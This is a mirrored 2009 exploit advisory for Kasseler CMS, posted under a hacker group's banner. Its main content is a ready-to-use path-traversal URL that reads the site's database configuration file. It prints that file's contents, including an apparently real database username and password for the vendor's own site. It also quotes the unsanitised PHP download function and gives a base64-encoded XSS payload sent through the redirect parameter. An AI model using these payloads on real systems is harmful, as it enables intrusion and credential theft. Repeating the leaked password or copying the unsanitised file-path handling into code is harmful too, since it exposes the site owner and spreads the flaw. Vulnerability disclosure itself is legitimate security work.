Lucene search
+L

Kasseler CMS File Disclosure / XSS

🗓️ 23 Jun 2009 00:00:00Reported by S(r1ptType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 25 Views

Kasseler CMS file disclosure and XSS vulnerabilitie

Code
`#X X   
# X X A K KK NN N EEEEEE TTTTTTTT  
# X X A A K K N N N E TT   
# XX AAAAA KK N N N EEE TT  
# X X A A K K N N N E TT  
# X X A A K KK N NN EEEEEE TT  
#X X   
  
Author: S(r1pt - xaknet.ru  
GreetZ to all users xaknet.ru, especial: baltazar, Saint, X1mer@, Trash, Ic3, G1yuk, NEXGEN, ErrNick, deface and other ..  
  
###  
Kasseler-Cms (Reafile/XSS) Multiple Remote Vulnerabilities  
Site author: kasseler-cms.net  
###  
  
Readfile:  
http://www.kasseler-cms.net/engine.php?do=download&file=../includes/config/configdb.php :  
<?php  
/**********************************************/  
/* Kasseler CMS: Content Management System */  
/**********************************************/  
/* */  
/* Copyright (c)2007-2009 by Igor Ognichenko */  
/* http://www.kasseler-cms.net/ */  
/* */  
/**********************************************/  
  
if (!defined('FUNC_FILE')) die('Access is limited');  
  
$database = array(  
'host' => 'localhost',  
'user' => 'kasseler_robin',  
'password' => 'cs010488oia',  
'name' => 'kasseler_cms',  
'prefix' => 'kasseler',  
'type' => 'mysql',  
'charset' => 'cp1251',  
'cache' => '',  
'sql_cache_clear' => 'INSERT,UPDATE,DELETE',  
'no_cache_tables' => 'sessions'  
);  
?>  
  
vulnerability in engine.php:  
function download(){  
global $config;   
require_once "includes/class/download.php";  
$file = "uploads/".$_GET['file']; #here =)  
$download = new file_download($file, 0, 1024);  
$download->download();  
}  
  
AND XSS bonus:  
http://www.kasseler-cms.net/engine.php?do=redirect&url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnRmluZWQgYnkgUyhyMXB0LCDQsNCz0LAuJyk7PC9zY3JpcHQ+   
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation